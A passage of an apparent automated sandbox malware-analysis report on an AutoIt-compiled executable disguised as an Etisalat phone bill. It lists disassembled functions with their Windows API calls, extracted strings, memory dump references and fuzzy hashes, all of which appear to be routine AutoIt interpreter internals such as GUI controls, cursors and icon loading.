                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: -es$AutoIt v3 GUI
                                      • API String ID: 1458621304-1956769002
                                      • Opcode ID: 8ccf8f58445cfc092faeb8c218f41379e3be3717b294aa7822eac79991167b8e
                                      • Instruction ID: 57dc454f6c3a7567660c4fbf4561d697b34201c1e612e18e61e7104223b691ec
                                      • Opcode Fuzzy Hash: 8ccf8f58445cfc092faeb8c218f41379e3be3717b294aa7822eac79991167b8e
                                      • Instruction Fuzzy Hash: 75B16E71A0024AEFEF14DFA8DC85BAE7BF4FB08710F108269FA15A7290DB749941CB50
                                      Function 00BE4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00BE40F6
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BE41B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: ea9b33bf73b0472701e51f0d7bb9b1e759bdedd8fc648a8f1b79e1aac1031174
                                      • Instruction ID: e0fe8de46f1368456e1318133c587de09d5f13e5a36aa0a439cfdcefca79c1a0
                                      • Opcode Fuzzy Hash: ea9b33bf73b0472701e51f0d7bb9b1e759bdedd8fc648a8f1b79e1aac1031174
                                      • Instruction Fuzzy Hash: E9A16F702243429FCB14EF21C991A6AB7E6FF85314F1449E8B9969B3D2DB34EC09CB51
                                      Function 00BD52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00BD5309
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00BD5314
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00BD531F
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00BD532A
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00BD5335
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00BD5340
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00BD534B
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00BD5356
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00BD5361
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00BD536C
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00BD5377
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00BD5382
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00BD538D
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00BD5398
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00BD53A3
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00BD53AE
                                      • GetCursorInfo.USER32(?), ref: 00BD53BE
                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00BD53E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$ErrorInfoLast
                                      • String ID:
                                      • API String ID: 3215588206-0
                                      • Opcode ID: 4766d3a3aff4c0fb1e3f23d3ffbe41200ab06255f4e7e3d56f8ddddb3ed02243
                                      • Instruction ID: 854e29dbed3450443b666be74d1e2d9da35cc668da3b4e7d3b42b090a15199fd
                                      • Opcode Fuzzy Hash: 4766d3a3aff4c0fb1e3f23d3ffbe41200ab06255f4e7e3d56f8ddddb3ed02243
                                      • Instruction Fuzzy Hash: 64415370E043196ADB209FBA8C4996EFFF8EF51B50B10457FE509E7290DAB89501CE61
                                      Function 00BBAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00BBAAA5
                                      • __swprintf.LIBCMT ref: 00BBAB46
                                      • _wcscmp.LIBCMT ref: 00BBAB59
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BBABAE
                                      • _wcscmp.LIBCMT ref: 00BBABEA
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00BBAC21
                                      • GetDlgCtrlID.USER32(?), ref: 00BBAC73
                                      • GetWindowRect.USER32(?,?), ref: 00BBACA9
                                      • GetParent.USER32(?), ref: 00BBACC7
                                      • ScreenToClient.USER32(00000000), ref: 00BBACCE
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00BBAD48
                                      • _wcscmp.LIBCMT ref: 00BBAD5C
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00BBAD82
                                      • _wcscmp.LIBCMT ref: 00BBAD96
                                        • Part of subcall function 00B8386C: _iswctype.LIBCMT ref: 00B83874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                      • String ID: %s%u
                                      • API String ID: 3744389584-679674701
                                      • Opcode ID: 77dca5ad0f5b9af5bb4ebf650502b64b562e1321509a3705830abe263c1b1e9f
                                      • Instruction ID: f843e8733b7befe1ca402a4a120e68e8449226ac58155337bfa49647d9f56a25
                                      • Opcode Fuzzy Hash: 77dca5ad0f5b9af5bb4ebf650502b64b562e1321509a3705830abe263c1b1e9f
                                      • Instruction Fuzzy Hash: AAA1D071A04246AFD714DF24C884FFABBE8FF04315F0086A9F9A993191DB70E955CB92
                                      Function 00BBB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00BBB3DB
                                      • _wcscmp.LIBCMT ref: 00BBB3EC
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BBB414
                                      • CharUpperBuffW.USER32(?,00000000), ref: 00BBB431
                                      • _wcscmp.LIBCMT ref: 00BBB44F
                                      • _wcsstr.LIBCMT ref: 00BBB460
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00BBB498
                                      • _wcscmp.LIBCMT ref: 00BBB4A8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BBB4CF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00BBB518
                                      • _wcscmp.LIBCMT ref: 00BBB528
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00BBB550
                                      • GetWindowRect.USER32(00000004,?), ref: 00BBB5B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: ca0da896442db529e7e0d42bbd39fbd4b68976b13c01e1ff3f655fe71a222c02
                                      • Instruction ID: 47ecb4a4428cf56dd6fed2487fc35baf3bfa72ec13fabdb7f45db8df35da1912
                                      • Opcode Fuzzy Hash: ca0da896442db529e7e0d42bbd39fbd4b68976b13c01e1ff3f655fe71a222c02
                                      • Instruction Fuzzy Hash: CF81AF710042469FDB10DF10C885FBAB7E8FF54714F0485A9FD868A1A2DBB4DE45CB61
                                      Function 00BBB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 37dfb97a5022891b3040c1dae944f6d73c1ef29366a6001343b02b241bcefadd
                                      • Instruction ID: 53c023361b4778d07e8cce3cc3166e2a15e1f42250e35c25bb3539f3d3342e60
                                      • Opcode Fuzzy Hash: 37dfb97a5022891b3040c1dae944f6d73c1ef29366a6001343b02b241bcefadd
                                      • Instruction Fuzzy Hash: DE31A131A44205ABDB14FA60CDA3EFE7BE4EF11B50F6001B9B441710E2EFE5AE44D6A1
                                      Function 00BBC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 00BBC4D4
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00BBC4E6
                                      • SetWindowTextW.USER32(?,?), ref: 00BBC4FD
                                      • GetDlgItem.USER32(?,000003EA), ref: 00BBC512
                                      • SetWindowTextW.USER32(00000000,?), ref: 00BBC518
                                      • GetDlgItem.USER32(?,000003E9), ref: 00BBC528
                                      • SetWindowTextW.USER32(00000000,?), ref: 00BBC52E
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00BBC54F
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00BBC569
                                      • GetWindowRect.USER32(?,?), ref: 00BBC572
                                      • SetWindowTextW.USER32(?,?), ref: 00BBC5DD
                                      • GetDesktopWindow.USER32 ref: 00BBC5E3
                                      • GetWindowRect.USER32(00000000), ref: 00BBC5EA
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00BBC636
                                      • GetClientRect.USER32(?,?), ref: 00BBC643
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00BBC668
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00BBC693
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 5ffc4c9bd53ceb7b29e59f30e5c8f0716ea7f7fed131d828e1425a6f9637ee0d
                                      • Instruction ID: ed6589eea98fc70c126be231e48cc4c895043ae8730c0c91e96c4ce9ef79fa85
                                      • Opcode Fuzzy Hash: 5ffc4c9bd53ceb7b29e59f30e5c8f0716ea7f7fed131d828e1425a6f9637ee0d
                                      • Instruction Fuzzy Hash: 04514F7190070AAFDB20DFA8DD85BBEBBF5FF04705F004569E686A75A0DBB4A904CB50
                                      Function 00BEA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BEA4C8
                                      • DestroyWindow.USER32(?,?), ref: 00BEA542
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BEA5BC
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BEA5DE
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BEA5F1
                                      • DestroyWindow.USER32(00000000), ref: 00BEA613
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B60000,00000000), ref: 00BEA64A
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BEA663
                                      • GetDesktopWindow.USER32 ref: 00BEA67C
                                      • GetWindowRect.USER32(00000000), ref: 00BEA683
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BEA69B
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BEA6B3
                                        • Part of subcall function 00B625DB: GetWindowLongW.USER32(?,000000EB), ref: 00B625EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1297703922-3619404913
                                      • Opcode ID: ab79706590a4679a64a8d71921cbb650dd09971ba0db45ba4bf4ff6ecba00c15
                                      • Instruction ID: 5246fa9090e9af951992f63f8074cbf950fc4047e56ffa7758a1ca3b4d9bfb4f
                                      • Opcode Fuzzy Hash: ab79706590a4679a64a8d71921cbb650dd09971ba0db45ba4bf4ff6ecba00c15
                                      • Instruction Fuzzy Hash: 5D71AF71140285AFD720CF28CC49F7A7BE9FB99704F08456DF9858B2A1DB74E942CB22
                                      Function 00BEC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DragQueryPoint.SHELL32(?,?), ref: 00BEC917
                                        • Part of subcall function 00BEADF1: ClientToScreen.USER32(?,?), ref: 00BEAE1A
                                        • Part of subcall function 00BEADF1: GetWindowRect.USER32(?,?), ref: 00BEAE90
                                        • Part of subcall function 00BEADF1: PtInRect.USER32(?,?,00BEC304), ref: 00BEAEA0
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00BEC980
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BEC98B
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BEC9AE
                                      • _wcscat.LIBCMT ref: 00BEC9DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BEC9F5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00BECA0E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00BECA25
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00BECA47
                                      • DragFinish.SHELL32(?), ref: 00BECA4E
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BECB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 169749273-3440237614
                                      • Opcode ID: c8c7c1b29ac3893e151b03ac849af57988c9fe35281a26baeee9179b98791327
                                      • Instruction ID: 2585286d17c2f6df377b9fb323f93335776e624e951869498223cea0c48d4e6c
                                      • Opcode Fuzzy Hash: c8c7c1b29ac3893e151b03ac849af57988c9fe35281a26baeee9179b98791327
                                      • Instruction Fuzzy Hash: 2B615971108381AFC711EF64DC85DAFBBE8EF89710F000A6EF591971A1DB709A49CB62
                                      Function 00BE4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00BE46AB
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BE46F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: cb6e534b76f20c9df80839fc0a029165069e50d5654a0eaa90a8ae6ef055e2f3
                                      • Instruction ID: 79f716408ce5ae506b25c8265e6c09146c4a7de742074313042bb31351877512
                                      • Opcode Fuzzy Hash: cb6e534b76f20c9df80839fc0a029165069e50d5654a0eaa90a8ae6ef055e2f3
                                      • Instruction Fuzzy Hash: 08917F742047419FCB14EF11C491AAAB7E6EF95354F0488ECF8965B3A2CB34ED4ADB81
                                      Function 00BEBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BEBB6E
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BE9431), ref: 00BEBBCA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BEBC03
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BEBC46
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BEBC7D
                                      • FreeLibrary.KERNEL32(?), ref: 00BEBC89
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BEBC99
                                      • DestroyIcon.USER32(?,?,?,?,?,00BE9431), ref: 00BEBCA8
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BEBCC5
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BEBCD1
                                        • Part of subcall function 00B8313D: __wcsicmp_l.LIBCMT ref: 00B831C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1212759294-1154884017
                                      • Opcode ID: 61c2b14d7069b5ef1876769c203f73ea91d17ac6997e6cc8e3f9f7350595fce6
                                      • Instruction ID: 7366b526ee4866acf19afa68cff2e424b4d885034b601bf616b10288ae207ccc
                                      • Opcode Fuzzy Hash: 61c2b14d7069b5ef1876769c203f73ea91d17ac6997e6cc8e3f9f7350595fce6
                                      • Instruction Fuzzy Hash: B061D171900299BAEB14DF75CC85FBF77E8EB08B11F204295F915DA1D0DB74AA90CBA0
                                      Function 00BCA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • CharLowerBuffW.USER32(?,?), ref: 00BCA636
                                      • GetDriveTypeW.KERNEL32 ref: 00BCA683
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BCA6CB
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BCA702
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BCA730
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 2698844021-4113822522
                                      • Opcode ID: 7512d52acbec9325b7462435e0297aa76c5212954af4f2da4a7778dfce48f796
                                      • Instruction ID: cb95215b5d1b96677177c91fccdfc278b94fbda8b3fe074bd927f6fb06779067
                                      • Opcode Fuzzy Hash: 7512d52acbec9325b7462435e0297aa76c5212954af4f2da4a7778dfce48f796
                                      • Instruction Fuzzy Hash: BC511771104305AFC700EF20C99196AB7F8FF98758F1449ADF896572A1DB35EE0ACB52
                                      Function 00BCA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BCA47A
                                      • __swprintf.LIBCMT ref: 00BCA49C
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BCA4D9
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BCA4FE
                                      • _memset.LIBCMT ref: 00BCA51D
                                      • _wcsncpy.LIBCMT ref: 00BCA559
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BCA58E
                                      • CloseHandle.KERNEL32(00000000), ref: 00BCA599
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00BCA5A2
                                      • CloseHandle.KERNEL32(00000000), ref: 00BCA5AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
